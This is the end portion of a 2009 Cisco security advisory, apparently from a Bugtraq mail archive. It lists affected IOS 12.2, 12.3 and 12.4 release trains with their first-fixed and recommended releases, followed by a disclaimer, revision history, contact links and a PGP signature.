|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1YJ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.2-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2B      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2BC     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.2BX     | first fixed | SB312.4(15) |
|            | in 12.4     | T812.4(23)  |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BY     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2CX     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2CY     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2CZ     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EW     | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EWA    | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
| 12.2EX     | 12.2(40)EX  | 12.2(44)EX1 |
|------------+-------------+-------------|
|            | 12.2(44)EY; | 12.2(46)EY; |
| 12.2EY     | Available   | Available   |
|            | on          | on          |
|            | 30-JAN-2009 | 23-JAN-2009 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2EZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)    |
| 12.2FY     | first fixed | EX112.2(44) |
|            | in 12.2EX   | SE4         |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.2IRA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IRB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXG    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2JK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2MB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2MC     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2S      | first fixed | 12.2(20)S12 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | 12.2(33)    |             |
|            | SB12.2(31)  |             |
| 12.2SB     | SB14;       | 12.2(33)SB3 |
|            | Available   |             |
|            | on          |             |
|            | 16-JAN-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SBC    | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2SCA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SCB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SE     | 12.2(40)SE  | 12.2(44)SE4 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEA    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEB    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEC    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SED    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEE    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEF    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)    |
| 12.2SEG    | first fixed | EX112.2(44) |
|            | in 12.2EX   | SE4         |
|------------+-------------+-------------|
| 12.2SG     | 12.2(44)SG  | 12.2(50)SG  |
|------------+-------------+-------------|
| 12.2SGA    | 12.2(31)    | 12.2(31)    |
|            | SGA9        | SGA9        |
|------------+-------------+-------------|
| 12.2SL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SM     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRA    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRB    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
| 12.2SRC    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SRD    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2STE    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2SU     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2SV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SW     | first fixed | 12.4(15)T8  |
|            | in 12.4SW   |             |
|------------+-------------+-------------|
| 12.2SX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXH    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SXI    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2SY     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2SZ     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2XF     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XK     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(20)    |
|            |             | S1212.2(33) |
|            |             | SB312.2(33) |
| 12.2XN     | 12.2(33)XN1 | SRC312.2    |
|            |             | (33)        |
|            |             | XNA212.2    |
|            |             | (33r)SRD2   |
|------------+-------------+-------------|
| 12.2XNA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2XNB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | 12.2(46)XO; | 12.2(46)XO; |
| 12.2XO     | Available   | Available   |
|            | on          | on          |
|            | 02-FEB-2009 | 02-FEB-2009 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XU     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2YA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YC     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YE     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YF     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YG     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YH     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2YM     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2YN     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2YP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YQ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YS     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2YT     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YU     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YW     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.2(13)ZC  |             |
|            | are         |             |
| 12.2ZC     | vulnerable, |             |
|            | release     |             |
|            | 12.2(13)ZC  |             |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|------------+-------------+-------------|
| 12.2ZD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZF     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZG     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2ZJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZU     | migrate to  |             |
|            | any release |             |
|            | in 12.2SXH  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZX     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2ZY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZYA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.3-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3B      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3BC     | 12.3(23)BC6 | 12.3(23)BC6 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3BW     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3EU     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.3JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3JK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3JL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3T      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3VA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XC     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XD     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XG     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XI     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XL     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XQ     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XS     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XW     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XX     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XY     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XZ     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3YA     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YF     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YH     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YI     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YM     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YQ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YS     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YX     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3ZA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.4-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
| 12.4       | 12.4(16)    | 12.4(23)    |
|------------+-------------+-------------|
| 12.4JA     | 12.4(16b)JA | 12.4(16b)   |
|            |             | JA1         |
|------------+-------------+-------------|
| 12.4JDA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JL     | 12.4(3)JL1  | 12.4(3)JL1  |
|------------+-------------+-------------|
| 12.4JMA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JMB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(16b)   |
| 12.4JX     | first fixed | JA1         |
|            | in 12.4JA   |             |
|------------+-------------+-------------|
| 12.4MD     | 12.4(15)MD  | 12.4(15)MD2 |
|------------+-------------+-------------|
| 12.4MR     | 12.4(16)MR  |             |
|------------+-------------+-------------|
| 12.4SW     | 12.4(11)SW3 | 12.4(15)T8  |
|------------+-------------+-------------|
| 12.4T      | 12.4(15)T   | 12.4(15)T8  |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XB     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XC     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XE     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XM     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XN     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4XQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XR     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            |             | 12.4(11)    |
|            |             | XW10;       |
| 12.4XW     | 12.4(11)XW3 | Available   |
|            |             | on          |
|            |             | 22-JAN-2009 |
|------------+-------------+-------------|
| 12.4XY     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XZ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4YA     | Not         |             |
|            | Vulnerable  |             |
+----------------------------------------+

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC58ACgkQ86n/Gc8U/uA6vACfY36eBjbCbnJsrnJlOCE0Mr6Y
JqUAn1TVyUvBk8lGTm94F+tvmZy4n3Ke
=cGUi
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058dc
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39165-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 48AEAEC145
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:25:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
